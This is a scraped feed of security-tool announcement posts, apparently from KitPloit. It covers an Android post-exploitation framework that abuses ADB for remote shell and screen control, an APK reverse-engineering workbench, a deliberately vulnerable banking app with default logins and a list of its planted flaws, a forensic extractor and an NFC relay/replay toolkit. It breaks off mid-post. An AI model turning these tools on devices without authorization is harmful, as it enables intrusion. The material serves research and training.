BEFORE using any encryption software, please check your country's laws, regulations and policies concerning the import, possession, or use, and re-export of encryption software, to see if this is permitted.</p> <p>See <a href="http://www.wassenaar.org/" rel="nofollow" target="_blank" title="Digital and Physical Security Advice App (31)"><em>http://www.wassenaar.org/</em></a> for more information.</p> <p><br /></p><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/securityfirst/Umbrella_android" rel="nofollow" target="_blank" title="Download Umbrella_android">Download Umbrella_android</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-31231887728869368402020-12-16T08:30:00.014-03:002020-12-16T08:30:05.083-03:00Ghost Framework - An Android Post-Exploitation Framework That Exploits The Android Debug Bridge To Remotely Access An Android Device<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-ZLLlLig8B18/X9btOAFsZCI/AAAAAAAAUpw/4ktMkjJ9VOAEcumizaD-84_wgnx6XGdBQCNcBGAsYHQ/s420/ghost_1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="420" data-original-width="332" height="400" src="https://1.bp.blogspot.com/-ZLLlLig8B18/X9btOAFsZCI/AAAAAAAAUpw/4ktMkjJ9VOAEcumizaD-84_wgnx6XGdBQCNcBGAsYHQ/w316-h400/ghost_1.png" width="316" /></a></div><p><br /></p><span style="font-size: large;"><b>About Ghost Framework</b></span><br /> <p>Ghost Framework is an <a href="https://www.kitploit.com/search/label/Android" target="_blank" title="Android">Android</a> <a href="https://www.kitploit.com/search/label/Post-Exploitation" target="_blank" title="post-exploitation">post-exploitation</a> framework that <a href="https://www.kitploit.com/search/label/Exploits" target="_blank" title="exploits">exploits</a> the Android Debug Bridge to remotely access an Android device. Ghost Framework gives you the power and convenience of remote Android device administration.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Getting started</b></span><br /> <p><strong>Ghost installation</strong></p> <p>To install <a href="https://www.kitploit.com/search/label/Ghost%20Framework" target="_blank" title="Ghost Framework">Ghost Framework</a> you should execute the following commands.</p> <pre><code>cd ghost<br />chmod +x install.sh<br />./install.sh</code></pre> <p><strong>Ghost uninstallation</strong></p> <p>To uninstall Ghost Framework you should execute the following commands.</p> <pre><code>cd ghost<br />chmod +x uninstall.sh<br />./uninstall.sh</code></pre> <br /><span style="font-size: large;"><b>Ghost Framework execution</b></span><br /> <p>To run Ghost Framework you should execute the following command.</p> <pre><code>ghost</code></pre> <br /><span style="font-size: large;"><b>Why Ghost Framework</b></span><br /> <ul> <li><strong>Simple and clear UX/UI.</strong> Ghost Framework has a simple and clear UX/UI. It is easy to understand, so it will be easier for you to master the Ghost Framework.</li> <li><strong>Device shell access.</strong> Ghost Framework has the ability to access the remote Android device shell without using <a href="https://www.kitploit.com/search/label/OpenSSH" target="_blank" title="OpenSSH">OpenSSH</a> or other protocols.</li> <li><strong>Controlling device screen.</strong> Ghost Framework has the ability to access the device screen and control it remotely using mouse and keyboard.</li> </ul> <span style="font-size: large;"><b>Ghost Framework disclaimer</b></span><br /> <p>Usage of the Ghost Framework for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, federal, and international laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/EntySec/ghost" rel="nofollow" target="_blank" title="Download Ghost">Download Ghost</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-64985205740495448092020-12-15T17:30:00.001-03:002020-12-15T17:30:00.205-03:00APKLab - Android Reverse Engineering WorkBench For VS Code<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-14H5yRXc-dw/X9briqJDhJI/AAAAAAAAUpM/xk22hOsYJssez99VOjvhqsb0JqAI_53dACNcBGAsYHQ/s512/APKLab_1_icon.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="512" data-original-width="512" height="320" src="https://1.bp.blogspot.com/-14H5yRXc-dw/X9briqJDhJI/AAAAAAAAUpM/xk22hOsYJssez99VOjvhqsb0JqAI_53dACNcBGAsYHQ/s320/APKLab_1_icon.png" /></a></div><h4 
align="center"><br /> </h4><p align="center"> APKLab seamlessly integrates the best open-source tools: <a href="https://github.com/ibotpeaches/apktool/" rel="nofollow" target="_blank" title="Apktool">Apktool</a>, <a href="https://github.com/skylot/jadx" rel="nofollow" target="_blank" title="Jadx">Jadx</a>, <a href="https://github.com/patrickfav/uber-apk-signer" rel="nofollow" target="_blank" title="uber-apk-signer">uber-apk-signer</a> and more to the excellent VS Code so you can focus on app <a href="https://www.kitploit.com/search/label/Analysis" target="_blank" title="analysis">analysis</a> and get it done without leaving the IDE.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: x-large;"><b>Features</b></span><br /> <ul> <li>Decode all the resources from an APK</li> <li>Disassemble the APK to Dalvik <a href="https://www.kitploit.com/search/label/Bytecode" target="_blank" title="bytecode">bytecode</a> aka Smali</li> <li>Decompile the APK to Java source</li> <li>Analyze & Hack effectively with feature-rich VS Code</li> <li>Build an APK from Smali and resources</li> <li>Rebuild an APK in Debug mode for dynamic analysis</li> <li>Sign the APK seamlessly during the build</li> <li>Install the APK directly from VS Code</li> <li>Support for Apktool-style projects (<code>apktool.yml</code>)</li> <li>Support for most <a href="https://www.kitploit.com/search/label/Apktool" target="_blank" title="Apktool">Apktool</a> CLI arguments</li> <li>Android resource frameworks <a href="https://www.kitploit.com/search/label/Management" target="_blank" title="management">management</a> (Coming soon!)</li> <li>Support for user-provided keystore for APK signing</li> <li>Download and configure missing dependencies</li> <li>Excellent Smali language support with <a href="https://marketplace.visualstudio.com/items?itemName=LoyieKing.smalise" rel="nofollow" target="_blank" title="Android Reverse Engineering WorkBench for VS Code 
(18)"><strong>Smalise</strong></a></li> <li>Supports Linux, Windows, and Mac</li> </ul> <br /><span style="font-size: x-large;"><b>Getting Started</b></span><br /> <br /><span style="font-size: large;"><b>Open APK or Apktool project</b></span><br /> <ul> <li> <p>Open the Command Palette (<kbd>Ctrl</kbd>+<kbd>Shift</kbd>+<kbd>P</kbd>) ➜ <kbd>APKLab: Open an APK</kbd></p> <div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-UhHk7xzwhJ0/X9brtAybXrI/AAAAAAAAUpQ/Y16bNfImvrMFax379MvQmvX-CK3BEcfIwCNcBGAsYHQ/s1075/APKLab_9_decode.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="649" data-original-width="1075" height="386" src="https://1.bp.blogspot.com/-UhHk7xzwhJ0/X9brtAybXrI/AAAAAAAAUpQ/Y16bNfImvrMFax379MvQmvX-CK3BEcfIwCNcBGAsYHQ/w640-h386/APKLab_9_decode.gif" width="640" /></a></div><p><br /></p> </li> <li> <p>Or just open an existing Apktool project folder</p> </li> </ul> <br /><span style="font-size: large;"><b>Rebuild and Sign APK</b></span><br /> <ul> <li> <p>Right-click on or inside the <code>apktool.yml</code> file ➜ <kbd>APKLab: Rebuild the APK</kbd></p> <div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-nh7RClR-Tes/X9br0Q0KrsI/AAAAAAAAUpY/uMZrBoDDzWMgFBoopEzBQ0NF6OtP5gHcwCNcBGAsYHQ/s1075/APKLab_10_rebuild.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="649" data-original-width="1075" height="386" src="https://1.bp.blogspot.com/-nh7RClR-Tes/X9br0Q0KrsI/AAAAAAAAUpY/uMZrBoDDzWMgFBoopEzBQ0NF6OtP5gHcwCNcBGAsYHQ/w640-h386/APKLab_10_rebuild.gif" width="640" /></a></div><p><br /></p></li></ul><span style="font-size: large;"><b>Install APK to device</b></span><br /> <ul> <li> <p>Right-click on the <code>.apk</code> file (in the <code>dist</code> directory) ➜ <kbd>APKLab: Install the APK</kbd></p> <div class="separator" style="clear: both; text-align: center;"><a 
href="https://1.bp.blogspot.com/-iZ9m9dnKyR8/X9br5rV34KI/AAAAAAAAUpc/4SMgufrLFgc1jj8F_R-no3nDde7poVxrQCNcBGAsYHQ/s1075/APKLab_11_install.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="649" data-original-width="1075" height="386" src="https://1.bp.blogspot.com/-iZ9m9dnKyR8/X9br5rV34KI/AAAAAAAAUpc/4SMgufrLFgc1jj8F_R-no3nDde7poVxrQCNcBGAsYHQ/w640-h386/APKLab_11_install.gif" width="640" /></a></div> </li> </ul> <br /><span style="font-size: x-large;"><b>Requirements</b></span><br /> <ul> <li> <p><strong>JDK 8+</strong></p> <blockquote> <p>Run <strong><code>java -version</code></strong> in your shell; if it is not found, download it from <a href="https://adoptopenjdk.net/" rel="nofollow" target="_blank" title="here">here</a>.</p> </blockquote> </li> <li> <p><strong>adb</strong></p> <blockquote> <p>Run <strong><code>adb devices</code></strong> in your shell; if it is not found, check <a href="https://www.xda-developers.com/install-adb-windows-macos-linux/" rel="nofollow" target="_blank" title="this guide">this guide</a>.</p> </blockquote> </li> <li> <p><a href="https://marketplace.visualstudio.com/items?itemName=LoyieKing.smalise" rel="nofollow" target="_blank" title="Android Reverse Engineering WorkBench for VS Code (24)"><strong>Smalise</strong></a> (recommended)</p> <blockquote> <p>It makes working with <code>smali</code> files a breeze.</p> </blockquote> </li> </ul> <br /><span style="font-size: x-large;"><b>Credits</b></span><br /> <ul> <li><a href="https://github.com/Feimaomii" rel="nofollow" target="_blank" title="Feimaomii">Feimaomii</a> for the awesome logo</li> <li><a href="https://github.com/amsharma44" rel="nofollow" target="_blank" title="Aman Sharma">Aman Sharma</a> for improved Windows support</li> <li><a href="https://github.com/iBotPeaches" rel="nofollow" target="_blank" title="iBotPeaches">iBotPeaches</a>, <a href="https://github.com/brutall" rel="nofollow" target="_blank" title="brutall">brutall</a> and <a 
href="https://github.com/JesusFreke" rel="nofollow" target="_blank" title="JesusFreke">JesusFreke</a> for Apktool & Smali</li> <li><a href="https://github.com/patrickfav" rel="nofollow" target="_blank" title="patrickfav">patrickfav</a> for uber-apk-signer</li> <li><a href="https://github.com/skylot" rel="nofollow" target="_blank" title="skylot">skylot</a> for Jadx</li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/Surendrajat/APKLab" rel="nofollow" target="_blank" title="Download APKLab">Download APKLab</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-41994666788039296212020-11-27T08:30:00.013-03:002020-11-27T08:30:11.626-03:00Damn-Vulnerable-Bank - Vulnerable Banking Application For Android<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-IjDaCUJ_k8A/X8Db3dUQiFI/AAAAAAAAUew/8Hywvt8W6pYu8q5jQi3JA9MoVGB2u7CMACNcBGAsYHQ/s2048/Damn-Vulnerable-Bank_1_screen1.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="2048" data-original-width="1048" height="640" src="https://1.bp.blogspot.com/-IjDaCUJ_k8A/X8Db3dUQiFI/AAAAAAAAUew/8Hywvt8W6pYu8q5jQi3JA9MoVGB2u7CMACNcBGAsYHQ/w328-h640/Damn-Vulnerable-Bank_1_screen1.jpeg" width="328" /></a></div><p><br /></p><p>The Damn <a href="https://www.kitploit.com/search/label/Vulnerable" target="_blank" title="Vulnerable">Vulnerable</a> Bank <a href="https://www.kitploit.com/search/label/Android%20Application" target="_blank" title="Android Application">Android Application</a> aims to provide an interface for everyone to get a detailed understanding of the internals and security aspects of an Android application.</p><span><a name='more'></a></span><p><br /></p><div class="separator" style="clear: both; text-align: center;"><a 
href="https://1.bp.blogspot.com/-RMupfO6CQno/X8Db9HQgo4I/AAAAAAAAUe0/xcbCc5QBGLklPd722cAVqgwnOBAnUpZ-gCNcBGAsYHQ/s2048/Damn-Vulnerable-Bank_2_screen2.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="2048" data-original-width="1054" height="640" src="https://1.bp.blogspot.com/-RMupfO6CQno/X8Db9HQgo4I/AAAAAAAAUe0/xcbCc5QBGLklPd722cAVqgwnOBAnUpZ-gCNcBGAsYHQ/w330-h640/Damn-Vulnerable-Bank_2_screen2.jpeg" width="330" /></a></div><p><br /></p><span style="font-size: large;"><b>How to Use the Application</b></span><br /> <ul> <li>Clone the repository and run the <a href="https://github.com/rewanth1997/Damn-Vulnerable-Bank/tree/master/BackendServer" rel="nofollow" target="_blank" title="Backend Server">Backend Server</a> as per the instructions in the link.</li> <li>We have released the APK; after downloading it, install it via adb or manually.</li> <li>After installation, open the app and add the backend IP on the home screen.</li> <li>Test that the backend is running by pressing the health check.</li> <li>Create an account using the sign-up option, then log in with your credentials.</li> <li>You can now see the dashboard and perform banking operations.</li> <li>Log in as admin to approve beneficiaries.</li> <li>The database is pre-populated with a few users for quick exploration.</li> </ul> <table> <tr> <th>Username</th> <th>Password</th> <th>Account Number</th> <th>Beneficiaries</th> <th>Admin privileges</th> </tr> <tr> <td>user1</td> <td>password1</td> <td>111111</td> <td>222222, 333333, 444444</td> <td>No</td> </tr> <tr> <td>user2</td> <td>password2</td> <td>222222</td> <td>None</td> <td>No</td> </tr> <tr> <td>user3</td> <td>password3</td> <td>333333</td> <td>None</td> <td>No</td> </tr> <tr> <td>user4</td> <td>password4</td> <td>444444</td> <td>None</td> <td>No</td> </tr> <tr> <td>admin</td> <td>admin</td> <td>999999</td> <td>None</td> <td>Yes</td> </tr> </table> <br /><span style="font-size: large;"><b>Features</b></span><br /> <ul class="contains-task-list"> 
<li class="task-list-item">Sign up</li> <li class="task-list-item">Login</li> <li class="task-list-item">My profile interface</li> <li class="task-list-item">Change password</li> <li class="task-list-item">Settings interface to update backend URL</li> <li class="task-list-item">Add <a href="https://www.kitploit.com/search/label/Fingerprint" target="_blank" title="fingerprint">fingerprint</a> check before transferring/viewing funds</li> <li class="task-list-item">Add pin check before transferring/viewing funds</li> <li class="task-list-item">View balance</li> <li class="task-list-item">Transfer money <ul class="contains-task-list"> <li class="task-list-item">Via manual entry</li> <li class="task-list-item">Via QR scan</li> </ul> </li> <li class="task-list-item">Add beneficiary</li> <li class="task-list-item">Delete beneficiary</li> <li class="task-list-item">View beneficiary</li> <li class="task-list-item">View transaction history</li> <li class="task-list-item">Download transaction history</li> </ul> <br /><span style="font-size: large;"><b>Building the APK with Obfuscation</b></span><br /> <ul> <li>Go to the Build menu and select Generate Signed Bundle/APK.</li> <li>Select APK as the option and click Next.</li> <li>A keystore is needed to sign the APK.</li> <li>Create a new keystore and remember its password.</li> <li>Select the newly created keystore and enter its password.</li> <li>Select Release as the build variant and V2 as the signature version.</li> <li>The APK can now be built successfully.</li> </ul> <br /><span style="font-size: large;"><b>List of <a href="https://www.kitploit.com/search/label/vulnerabilities" target="_blank" title="vulnerabilities">vulnerabilities</a> in the application</b></span><br /> <p>To keep things crisp and interesting, we have hidden this section. Do not expand it if you want a fun and challenging experience. 
Try to explore the application, find all the possible vulnerabilities and then cross check your findings with this list.</p> <details> <summary>Spoiler Alert</summary> <ul class="contains-task-list"> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Root and emulator detection</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Anti-debugging checks (prevents hooking with frida, jdb, etc)</li> <li class="task-list-item"><input class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> SSL pinning - pin the certificate/public key</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Obfuscate the entire code</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Encrypt all requests and responses</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Hardcoded sensitive information</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Logcat leakage</li> <li class="task-list-item"><input class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Insecure storage (saved credit card numbers maybe)</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Exported activities</li> <li class="task-list-item"><input class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> JWT token</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Webview integration</li> <li class="task-list-item"><input checked="" class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> Deep links</li> <li class="task-list-item"><input 
class="task-list-item-checkbox" disabled="" id="" type="checkbox" /> IDOR</li> </ul> </details> <br /><span style="font-size: large;"><b>Backend to-do</b></span><br /> <ul class="contains-task-list"> <li class="task-list-item">Add profile and change-password routes</li> <li class="task-list-item">Create different secrets for admin and other users</li> <li class="task-list-item">Add dynamic generation of secrets to verify JWT tokens</li> <li class="task-list-item">Introduce bug in jwt verification</li> <li class="task-list-item">Find a way to store database and mount it while using docker</li> <li class="task-list-item">Dockerize environment</li> </ul> <br /><span style="font-size: large;"><b>Authors</b></span><br /> <p>Thanks to these amazing people</p> <table> <tr> <th></th> <th></th> <th></th> </tr> <tr> <td>Rewanth Cool (Rest API)</td> <td><a href="https://github.com/rewanth1997/" rel="nofollow" target="_blank" title="Github">Github</a></td> <td><a href="https://www.linkedin.com/in/rewanthcool/" rel="nofollow" target="_blank" title="LinkedIn">LinkedIn</a></td> </tr> <tr> <td>Hrushikesh Kakade (Android App)</td> <td><a href="https://github.com/HrushikeshK/" rel="nofollow" target="_blank" title="Github">Github</a></td> <td><a href="https://www.linkedin.com/in/hrushikeshkakade/" rel="nofollow" target="_blank" title="LinkedIn">LinkedIn</a></td> </tr> <tr> <td>Akshansh Jaiswal (Android App)</td> <td><a href="https://github.com/jaiswalakshansh" rel="nofollow" target="_blank" title="Github">Github</a></td> <td><a href="https://www.linkedin.com/in/akshanshjaiswal/" rel="nofollow" target="_blank" title="LinkedIn">LinkedIn</a></td> </tr> </table> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/rewanth1997/Damn-Vulnerable-Bank" rel="nofollow" target="_blank" title="Download Damn-Vulnerable-Bank">Download 
Damn-Vulnerable-Bank</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-22825096726509058912020-11-12T17:30:00.005-03:002020-11-12T17:30:00.486-03:00FAMA - Forensic Analysis For Mobile Apps<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-F9bNSgubhdI/X6zFa5P9PYI/AAAAAAAAUUo/K8JtZ-vh05Iy8rSDav8xkK8Rvp-ZaGpgQCNcBGAsYHQ/s1350/FAMA_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="561" data-original-width="1350" height="266" src="https://1.bp.blogspot.com/-F9bNSgubhdI/X6zFa5P9PYI/AAAAAAAAUUo/K8JtZ-vh05Iy8rSDav8xkK8Rvp-ZaGpgQCNcBGAsYHQ/w640-h266/FAMA_2.png" width="640" /></a></div><p><br /></p><span style="font-size: x-large;"><b>LabCIF - <a href="https://www.kitploit.com/search/label/Forensic%20Analysis" target="_blank" title="Forensic Analysis">Forensic Analysis</a> for Mobile Apps</b></span><br /> <br /><span style="font-size: large;"><b>Getting Started</b></span><br /> <p>Android extraction and <a href="https://www.kitploit.com/search/label/Analysis%20Framework" target="_blank" title="analysis framework">analysis framework</a> with an integrated Autopsy Module. 
Easily dump user data from a device and generate powerful reports for Autopsy or external applications.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Functionalities</b></span><br /> <ul> <li>Extract user application data from an Android device with ADB (root and ADB required).</li> <li>Dump user data from an Android image or mounted path.</li> <li>Easily build modules for a specific Android application.</li> <li>Generate clean and readable JSON reports.</li> <li>Complete integrated Autopsy compatibility (datasource processor module, ingest module, report module, geolocation, communication and timeline support).</li> <li>Export HTML report based on the current case.</li> </ul> <br /><b>Report Screenshots</b><br /> <p><br /></p> <div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-VptKOPmlQUE/X6zFJnXNYVI/AAAAAAAAUUg/iBWosC52ufk6EedWb1ytAgDfS7hWIpNDgCNcBGAsYHQ/s1166/FAMA_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="356" data-original-width="1166" height="196" src="https://1.bp.blogspot.com/-VptKOPmlQUE/X6zFJnXNYVI/AAAAAAAAUUg/iBWosC52ufk6EedWb1ytAgDfS7hWIpNDgCNcBGAsYHQ/w640-h196/FAMA_1.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-eRSQh87vBeU/X6zFJpZEzcI/AAAAAAAAUUc/yljgC6HGon4A8YN8mgwcSZGVNn7oFLtmACNcBGAsYHQ/s1350/FAMA_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="561" data-original-width="1350" height="266" src="https://1.bp.blogspot.com/-eRSQh87vBeU/X6zFJpZEzcI/AAAAAAAAUUc/yljgC6HGon4A8YN8mgwcSZGVNn7oFLtmACNcBGAsYHQ/w640-h266/FAMA_2.png" width="640" /></a></div><p><br /></p><span style="font-size: large;"><b>Prerequisites</b></span><br /> <ul> <li><a href="https://www.python.org/downloads/" rel="nofollow" target="_blank" title="Python">Python</a> (2.7+)</li> <li><a 
href="https://www.sleuthkit.org/autopsy/" rel="nofollow" target="_blank" title="Autopsy">Autopsy</a> (optional)</li> </ul> <br /><span style="font-size: large;"><b>How to use</b></span><br /> <p>The script can be used directly from the terminal or as an Autopsy module.</p> <br /><b>Running from Terminal</b><br /> <div><pre><code>usage: start.py [-h] [-d DUMP [DUMP ...]] [-p PATH] [-o OUTPUT] [-a] app<br /><br />Forensics Artefacts Analyzer<br /><br />positional arguments:<br /> app Application or package to be analyzed <tiktok> or <com.zhiliaoapp.musically><br /><br />optional arguments:<br /> -h, --help show this help message and exit<br /> -d DUMP [DUMP ...], --dump DUMP [DUMP ...] Analyze specific(s) dump(s) <20200307_215555 ...><br /> -p PATH, --path PATH Dump app data in path (mount or folder structure)<br /> -o OUTPUT, --output OUTPUT Report output path folder<br /> -a, --adb Dump app data directly from device with ADB<br /> -H, --html Generate HTML report</code></pre></div> <br /><b>Running from Autopsy</b><br /> <ol> <li>Download the repository contents (<a href="https://github.com/labcif/FAMA/archive/master.zip" rel="nofollow" target="_blank" title="zip">zip</a>).</li> <li>Open Autopsy -> Tools -> Python Plugins</li> <li>Unzip the previously downloaded zip in the <code>python_modules</code> folder.</li> <li>Restart Autopsy, create a case and select the module.</li> <li>Select your module options in the Ingest Module window selector.</li> <li>Click "Generate Report" to generate an HTML report of the case.</li> </ol> <br /><span style="font-size: large;"><b>Build an application module</b></span><br /> <p>Do you need a <a href="https://www.kitploit.com/search/label/Forensics" target="_blank" title="forensics">forensics</a> module for a specific Android application? 
Follow the instructions <a href="https://github.com/labcif/FAMA/blob/master/modules/README.md" rel="nofollow" target="_blank" title="here">here</a> and build a module yourself.</p> <br /><span style="font-size: large;"><b>Authors</b></span><br /> <ul> <li><strong>José Francisco</strong> - <a href="https://github.com/98jfran" rel="nofollow" target="_blank" title="GitHub">GitHub</a></li> <li><strong>Ruben Nogueira</strong> - <a href="https://github.com/rubnogueira" rel="nofollow" target="_blank" title="GitHub">GitHub</a></li> </ul> <br /><span style="font-size: large;"><b>Mentors</b></span><br /> <ul> <li><strong>Miguel Frade</strong> - <a href="https://github.com/mfrade" rel="nofollow" target="_blank" title="GitHub">GitHub</a></li> <li><strong>Patrício Domingues</strong> - <a href="https://github.com/PatricioDomingues" rel="nofollow" target="_blank" title="GitHub">GitHub</a></li> </ul> <p>Project developed as the final project of the <a href="https://www.kitploit.com/search/label/Computer%20Engineering" target="_blank" title="Computer Engineering">Computer Engineering</a> course at Escola Superior de Tecnologia e Gestão de Leiria.</p> <br /><span style="font-size: large;"><b>Environments Tested</b></span><br /> <ul> <li>Windows (primary)</li> <li>Linux</li> <li>Mac OS</li> </ul> <br /><span style="font-size: large;"><b>License</b></span><br /> <p>This project is licensed under the terms of the GNU GPL v3 License.</p> <ul> <li><a href="https://developer.android.com/studio/releases/platform-tools" rel="nofollow" target="_blank" title="ADB">ADB</a> - Android Software Development Kit License Agreement</li> <li><a href="http://rtner.de/software/base64.html" rel="nofollow" target="_blank" title="Base64">Base64</a> - GNU GPL v2 License</li> <li><a href="https://getbootstrap.com/" rel="nofollow" target="_blank" title="Bootstrap">Bootstrap</a> - MIT License</li> <li><a href="https://github.com/feathericons/feather" rel="nofollow" target="_blank" title="feather">feather</a> - MIT 
License</li> <li><a href="https://www.flaticon.com/packs/user-interface-111" rel="nofollow" target="_blank" title="Freepic Icons">Freepic Icons</a></li> <li><a href="https://jquery.com/" rel="nofollow" target="_blank" title="jQuery">jQuery</a> - MIT License</li> <li><a href="https://github.com/eisbehr-/jquery.lazy" rel="nofollow" target="_blank" title="jQuery.lazy">jQuery.lazy</a> - MIT License</li> <li><a href="https://github.com/Leaflet/Leaflet" rel="nofollow" target="_blank" title="leaflet">leaflet</a> - BSD 2-Clause "Simplified" License</li> <li><a href="https://github.com/bpampuch/pdfmake" rel="nofollow" target="_blank" title="pdfmake">pdfmake</a> - MIT License</li> <li><a href="https://github.com/mdegrazia/SQLite-Deleted-Records-Parser" rel="nofollow" target="_blank" title="SQLite-Deleted-Records-Parser">SQLite-Deleted-Records-Parser</a> - GNU GPL v3 License</li> <li><a href="https://github.com/witwall/undark" rel="nofollow" target="_blank" title="Undark">Undark</a> - BSD License 2.0</li> </ul> <br /><ul> </ul> <br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/labcif/FAMA" rel="nofollow" target="_blank" title="Download FAMA">Download FAMA</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-51400642444956167582020-11-11T08:30:00.013-03:002020-11-11T08:30:00.270-03:00NFCGate - An NFC Research Toolkit Application For Android<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-r7mQY0joQaw/X6iIPROLwTI/AAAAAAAAUUA/M-AJW17UPbkehfYxNZ-mO3B9n8g8WcnZACNcBGAsYHQ/s348/nfc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="145" data-original-width="348" height="266" src="https://1.bp.blogspot.com/-r7mQY0joQaw/X6iIPROLwTI/AAAAAAAAUUA/M-AJW17UPbkehfYxNZ-mO3B9n8g8WcnZACNcBGAsYHQ/w640-h266/nfc.png" width="640" /></a></div><p><br /></p> <p>NFCGate is an 
Android application meant to capture, analyze, or modify NFC traffic. It can be used as a research tool to <a href="https://www.kitploit.com/search/label/Reverse%20Engineer" target="_blank" title="reverse engineer">reverse engineer</a> protocols or to assess the security of protocols against traffic modification.</p> <span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Notice</b></span><br /> <p>This application was developed for security research purposes by students of the <a href="https://www.seemoo.tu-darmstadt.de/" rel="nofollow" target="_blank" title="Secure Mobile Networking Lab">Secure Mobile Networking Lab</a> at <a href="https://www.tu-darmstadt.de/" rel="nofollow" target="_blank" title="TU Darmstadt">TU Darmstadt</a>. Please do not use this application for malicious purposes.</p> <br /><span style="font-size: large;"><b>Features</b></span><br /> <ul> <li><strong>On-device capture</strong>: Captures NFC traffic sent and received by other applications running on the device.</li> <li><strong>Relay</strong>: Relays NFC traffic between two devices using <a href="https://github.com/nfcgate/server" rel="nofollow" target="_blank" title="a server">a server</a>. One device operates as a "reader" that reads an NFC tag; the other device emulates an NFC tag using Host Card Emulation (HCE).</li> <li><strong>Replay</strong>: Replays previously captured NFC traffic in either "reader" or "tag" mode.</li> <li><strong>Clone</strong>: Clones the initial tag information (e.g. 
ID).</li> <li><a href="https://github.com/pcapng/pcapng" rel="nofollow" target="_blank" title="pcapng">pcapng</a> export of captured NFC traffic, readable by Wireshark.</li> </ul> <br /><span style="font-size: large;"><b>Requirements for specific modes</b></span><br /> <ul> <li>NFC support</li> <li>Android 4.4+ (API level 19+)</li> <li><a href="https://github.com/ElderDrivers/EdXposed" rel="nofollow" target="_blank" title="EdXposed">EdXposed</a> or <a href="https://repo.xposed.info/" rel="nofollow" target="_blank" title="Xposed">Xposed</a>: On-device capture, relay tag mode, replay tag mode, clone mode.</li> <li>ARMv8-A, ARMv7: Relay tag mode, replay tag mode, clone mode.</li> <li><a href="https://developer.android.com/guide/topics/connectivity/nfc/hce" rel="nofollow" target="_blank" title="HCE">HCE</a>: Relay tag mode, replay tag mode, clone mode.</li> </ul> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <br /><b>Building</b><br /> <ol> <li>Initialize submodules: <code>git submodule update --init</code></li> <li>Build using <a href="https://www.kitploit.com/search/label/Android%20Studio" target="_blank" title="Android Studio">Android Studio</a> or Gradle</li> </ol> <br /><b>Operating Modes</b><br /> <p>As instructions differ per mode, each mode is described in detail in its own document in <code>doc/mode/</code>:</p> <ul> <li><a href="https://github.com/nfcgate/nfcgate/blob/v2/doc/mode/OnDevice.md" rel="nofollow" target="_blank" title="An NFC research toolkit application for Android (10)"><strong>On-device capture</strong></a></li> <li><a href="https://github.com/nfcgate/nfcgate/blob/v2/doc/mode/Relay.md" rel="nofollow" target="_blank" title="An NFC research toolkit application for Android (11)"><strong>Relay</strong></a></li> <li><a href="https://github.com/nfcgate/nfcgate/blob/v2/doc/mode/Replay.md" rel="nofollow" target="_blank" title="An NFC research toolkit application for Android 